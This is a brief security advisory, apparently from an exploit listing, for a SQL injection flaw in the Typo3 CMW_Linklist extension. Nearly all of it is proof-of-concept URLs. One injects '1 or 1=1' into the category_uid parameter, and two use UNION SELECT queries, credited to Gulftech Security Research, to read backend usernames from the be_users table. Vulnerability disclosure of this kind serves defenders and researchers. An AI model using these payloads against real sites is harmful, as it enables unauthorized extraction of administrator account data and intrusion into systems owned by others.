Typo3 CMW_Linklist Extension SQL Injection Vulnerability

Typo3 CMW_Linklist Extension SQL Injection Vulnerability

No exploit is required.

The following proof of concept is available:
http://www.example.com/[LinksSection]?&no_cache=1&action=getviewcategory&category_uid=1%20or%201=1

Gulftech Security Research has supplied the following additional proof of concepts:
A test for vulnerability:
http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username%20FROM%20be_users%20WHERE%20uid=1/*
Lists user names and categories:
http://www.example.com/[path]/?&action=getviewcategory&category_uid=-99%20UNION%20SELECT%20username,null%20FROM%20be_users%20WHERE%201/*